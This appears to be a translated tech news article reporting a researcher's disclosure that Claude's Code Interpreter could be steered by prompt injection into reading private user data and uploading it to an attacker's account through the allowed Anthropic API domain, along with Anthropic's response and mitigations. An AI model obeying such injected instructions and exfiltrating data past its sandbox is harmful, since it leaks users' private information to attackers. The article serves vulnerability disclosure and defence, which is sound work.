Claude can be tricked into sending your private company data to hackers – all it takes is a few kind words

Claude’s code interpreter can be exploited to exfiltrate private user data via rapid injection
Researcher tricked Claude into uploading sandboxed data to his Anthropic account using API access
Anthropic now treats such vulnerabilities as reportable and encourages users to monitor or disable access

Claude, one of the more popular AI tools out there, has a vulnerability that allows threat actors to wipe out private user data, experts have warned.

Cybersecurity researcher Johann Rehberger, AKA Wunderwuzzi, who recently wrote an in-depth report on his findings, finding the root of the problem is Claude’s Code Interpreter, a sandbox environment that lets AI write and run code (for example, to analyze data or generate files) directly in a conversation.

Recently, Code Interpreter gained the ability to make network requests, which makes it possible to connect to the Internet and, for example, download software packages.

Keeping an eye on Claude

By default, Anthropic’s Claude is supposed to only have access to “secure” domains like GitHub or PyPI, but among the approved domains is api.anthropic.com (the same API that Claude himself uses), which opened the door for exploitation.

Wunderwuzzi showed that he was able to trick Claude into reading private user data, store that data inside the sandbox, and upload it to his Anthropic account using his own API key via Claude’s Files API.

In other words, even if network access appears to be limited, the attacker can manipulate the model via rapid injection to exfiltrate user data. The exploit could transfer up to 30 MB per file and multiple files could be uploaded.

Wunderwuzzi disclosed its findings to Anthropic via HackerOne, and while the company initially classified it as a “model security issue,” not a “security vulnerability,” it later acknowledged that such exfiltration flaws are in scope for reporting. At first, Anthropic said users should “monitor Claude while using the feature and stop it if you see it using or accessing data unexpectedly.”

A subsequent update said: “Anthropic has confirmed that data exfiltration vulnerabilities like this are within the scope of reporting and this issue should not have been closed as out of scope,” he said in the report. “There was a problem in the process that they will work to resolve.”

His suggestion to Anthropic is to limit Claude’s network communications to only the user’s own account, and users should monitor Claude’s activity closely or disable network access if concerned.

Via The register

The best antivirus for all budgets

Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the Follow button!

And of course you can too follow TechRadar on TikTok for news, reviews, video unboxings, and get regular updates from us on WhatsApp also.

Must Read

Leave a Comment Cancel Reply